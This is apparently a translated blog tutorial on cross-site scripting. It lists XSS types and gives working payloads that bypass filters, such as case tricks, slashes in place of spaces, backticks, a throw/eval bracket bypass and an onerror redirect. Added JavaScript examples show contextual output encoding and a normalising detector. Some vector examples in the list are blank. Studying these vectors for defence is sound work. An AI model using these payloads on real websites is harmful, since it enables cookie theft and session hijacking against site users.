XSS filtering summary

One. Brief introduction

XSS attacks generally exploit vulnerabilities left behind during web page development to inject malicious script into a page by some clever means, so that the user's browser loads and executes code the attacker has crafted.
For example:
1. Abusing cookies to obtain sensitive information.
2. Using embedded Flash to gain higher privileges through the crossdomain permission settings, or using Java to achieve a similar result.
3. Using iframe, frame, XMLHttpRequest or the Flash technique above to perform administrative actions as the (attacked) user, or ordinary operations such as posting on Weibo, adding friends, sending private messages, and so on.
4. Exploiting the fact that the attackable domain is trusted by other domains, and requesting, as a trusted source, operations that would normally not be allowed, such as improper voting.
5. XSS on a page with extremely high traffic can be used to attack small websites, achieving the effect of a DDoS attack.

Two. Classification

Reflected
Reflected cross-site scripting is the most common and widely used type; the malicious script is attached to the parameters of a URL. Attackers generally induce users to visit a URL containing the malicious code through some specific means (such as email). When the victim clicks one of these specially crafted links, the malicious code executes directly in the victim's browser. This type of XSS usually appears in a site's search box, login form, and similar places, and is often used to steal client cookies or for phishing.

Stored
Persistent cross-site scripting is also known as stored cross-site scripting. This type of XSS does not require the user to click a specific URL for the script to execute: the attacker uploads or stores the malicious code on the vulnerable server in advance, and as long as a victim browses the page containing it, the malicious code runs. Persistent XSS generally appears in interactive features such as message boards, comments and blog posts, and the malicious script is stored in the database on the client or server side.

DOM-based
Traditional XSS vulnerabilities generally appear in server-side code, but browser users can also manipulate some objects in the DOM, such as URL and location. If the data entered by the user on the client side contains malicious JavaScript, and these scripts are not properly filtered and sanitized, the application may be attacked by DOM-based XSS. (A special type of reflected XSS.) Exists in GET; cookie reference.

Three. Without filtering

Some common tags
1.

2.
<img src=1 onerror=alert("xss");>

3.

Competing for focus to trigger the onblur event
<input onblur=alert("xss") autofocus>

The autofocus attribute makes the focus jump automatically to the input element and fires its focus event, so this vector triggers without any user interaction.

4.

The open attribute triggers the ontoggle event without any user interaction.

5.

6.

The autofocus attribute makes the focus jump automatically to the input element and fires its focus event, so this vector triggers without any user interaction.

7.

The javascript: pseudo-protocol

1. Tag
xss

Click the xss link to trigger it.
2. Tag

3. Tag
<img src=javascript:alert('xss')> // IE7 and below only
4. Tag

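Every vector in this section relies on untrusted text landing in an HTML context unchanged. The added example below, which is not code from the original post, shows the defence that makes them inert: encoding each value for the exact context it is written into (text node, attribute value, URL), and validating the scheme of user-supplied links so the javascript: pseudo-protocol is rejected rather than escaped. All function names (encodeForHtmlText, encodeForHtmlAttribute, safeHref, renderComment, renderLink) and the sample inputs are this example's own.

```javascript
// Added example (not from the original post): contextual output encoding, the
// defence that keeps the tag and event-handler vectors above from executing.
// The function names (encodeForHtmlText, encodeForHtmlAttribute, safeHref,
// renderComment, renderLink) are this example's own, not a library API.

// HTML text context: escape the characters that can change parser state.
function encodeForHtmlText(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: encode everything except [A-Za-z0-9] as a numeric
// character reference, so the value can neither close its quotes nor start a
// second attribute (autofocus/onblur and open/ontoggle both need that step).
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

// URL context (href/src): validate the scheme rather than escape. Browsers
// drop tabs, newlines and leading control characters before parsing a URL,
// so they are stripped first; anything that then carries a scheme other than
// http or https (javascript:, data:, vbscript: ...) is replaced outright.
function safeHref(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const m = cleaned.match(/^([a-z][a-z0-9+.-]*):/);
  if (m && m[1] !== 'http' && m[1] !== 'https') return 'about:blank';
  return String(url);
}

// Renderer for a stored comment (the persistent-XSS case): each untrusted
// value is encoded for the exact context it lands in.
function renderComment(author, body) {
  return `<p class="comment" data-author="${encodeForHtmlAttribute(author)}">` +
    `${encodeForHtmlText(body)}</p>`;
}

// Renderer for a user-supplied link (the javascript: pseudo-protocol case).
function renderLink(text, url) {
  return `<a href="${encodeForHtmlAttribute(safeHref(url))}">` +
    `${encodeForHtmlText(text)}</a>`;
}

// Constructed inputs modelled on the vectors listed in this section.
const samples = [
  ['comment', 'alice', '<img src=1 onerror=alert("xss")>'],
  ['comment', 'x" autofocus onblur=alert(1) y="', 'hello'],
  ['link', 'click me', "javascript:alert('xss')"],
  ['link', 'docs', 'https://example.com/docs?q=1'],
];
for (const [kind, a, b] of samples) {
  console.log(kind === 'comment' ? renderComment(a, b) : renderLink(a, b));
}
```

The point of the three separate encoders is that one function cannot serve all contexts: text encoding leaves spaces and `=` alone, which is harmless in a text node but would let a value break out of an unquoted attribute, and no amount of escaping turns a javascript: URL into a safe one, so the URL case is a validation decision, not an encoding one.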
Four. With filtering

1. Spaces filtered
Use / instead of spaces
<img/src="x"/onerror=alert("xss");>

2. Keywords filtered
Case bypass
<ImG sRc=x onerRor=alert("xss");>

3. Character splicing
Using eval

Using top

4. Other character confusion
Some WAFs use regular expressions to detect XSS attacks. If we can fuzz out the regular rules,
we can use other characters to confuse the code we inject.
Here are a few simple examples

The precedence of comments, tags and so on can be exploited
1.<

5. Encoding bypass
Unicode encoding bypass

URL encoding bypass

ASCII code bypass

6. Double and single quotes filtered
Inside an HTML tag the quotes can simply be omitted. Inside JS, backticks can be used instead of single and double quotes.
<img src="x" onerror=alert(`xss`);>

7. Brackets filtered
When brackets are filtered, throw can be used to bypass
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">

8. Use // in place of http:// inside the HTML tag
<img src="x" onerror=document.location= //www.baidu.com>

9. Comment bypass

Most e-commerce search boxes can be bypassed this way.
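Each bypass in this section defeats one strip-style rule because the rule matches the raw bytes while the browser matches a decoded, case-folded, whitespace-tolerant form. The added example below is not code from the original post: it models the section's strip filters (FILTERS), checks that the section's own vectors still look like XSS after each one has run (survivesFilter), and contrasts this with a detector that canonicalises first (normalizeForDetection, looksLikeXss), including the URL-, double-URL- and character-reference-encoded forms the encoding-bypass item refers to. All names and sample inputs are this example's own.

```javascript
// Added example (not from the original post): why the strip-style filters in
// this section fail, and what a detector that normalises first sees instead.
// FILTERS, normalizeForDetection, looksLikeXss and survivesFilter are this
// example's own names; the payloads are constructed from the section's vectors.

// Strip-style blacklist filters of the kind the section describes, one per rule.
const FILTERS = {
  stripSpaces:   (s) => s.replace(/ /g, ''),
  stripKeywords: (s) => s.replace(/script|onerror|onload/g, ''), // case-sensitive
  stripQuotes:   (s) => s.replace(/["']/g, ''),
  stripBrackets: (s) => s.replace(/[()]/g, ''),
};

// Safe String.fromCodePoint for entity decoding (out-of-range values become '').
function cp(n) {
  return Number.isInteger(n) && n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : '';
}

// Canonicalise the way a browser would before matching: percent-decode (a few
// rounds, to unwrap double encoding), decode numeric character references,
// drop the control characters parsers ignore, fold case, and treat '/' between
// tag parts like whitespace (the "use / instead of spaces" trick above).
function normalizeForDetection(input) {
  let s = String(input);
  for (let i = 0; i < 3; i++) {
    let d;
    try { d = decodeURIComponent(s); } catch (e) { d = s; } // malformed % sequences stay as-is
    if (d === s) break;
    s = d;
  }
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
       .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
  s = s.replace(/[\u0000\t\r\n]/g, '').toLowerCase();
  return s.replace(/[\s\/]+/g, ' ');
}

// Indicators are checked on the normalised form only.
const XSS_INDICATORS = [
  /<\s*[a-z]/,        // start of an element (img, svg, input, details, script ...)
  /\bon[a-z]+\s*=/,   // any on* event-handler attribute
  /javascript\s*:/,   // the javascript: pseudo-protocol
];

function looksLikeXss(input) {
  const n = normalizeForDetection(input);
  return XSS_INDICATORS.some((re) => re.test(n));
}

// Does the payload still look like XSS after the named strip filter has run?
function survivesFilter(filterName, payload) {
  return looksLikeXss(FILTERS[filterName](payload));
}

// Constructed (filter, payload) pairs taken from the section's bypasses.
const BYPASSES = [
  ['stripSpaces',   '<img/src="x"/onerror=alert("xss");>'],
  ['stripKeywords', '<ImG sRc=x onerRor=alert("xss");>'],
  ['stripQuotes',   '<img src=x onerror=alert(`xss`);>'],
  ['stripBrackets', '<svg/onload="window.onerror=eval;throw\'=alert\\x281\\x29\';">'],
];

// Encoded variants the normaliser unwraps before matching (constructed).
const ENCODED = [
  '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E',             // URL encoding
  '%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E', // double URL encoding
  '<a href="&#106;ava&#x73;cript:alert(1)">x</a>',        // numeric character references
];

// Benign inputs that must not be flagged (constructed).
const BENIGN = ['price < 100 and a/b ratio', '100% sure <3 you', 'turn it on = done'];

for (const [f, p] of BYPASSES) console.log(f, 'bypassed:', survivesFilter(f, p));
for (const e of ENCODED) console.log('flagged:', looksLikeXss(e), e);
for (const b of BENIGN) console.log('flagged:', looksLikeXss(b), b);
```

The normalising detector is suitable for logging and WAF-style alerting, where a false positive costs an analyst a minute; it is still a blacklist and should not be the control that decides what reaches the page. Contextual output encoding at the point where the data is written into HTML is the control that works regardless of which keyword, quote or bracket the attacker avoided.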

Source: blog.csdn.net/weixin_42109829/article/details/103379132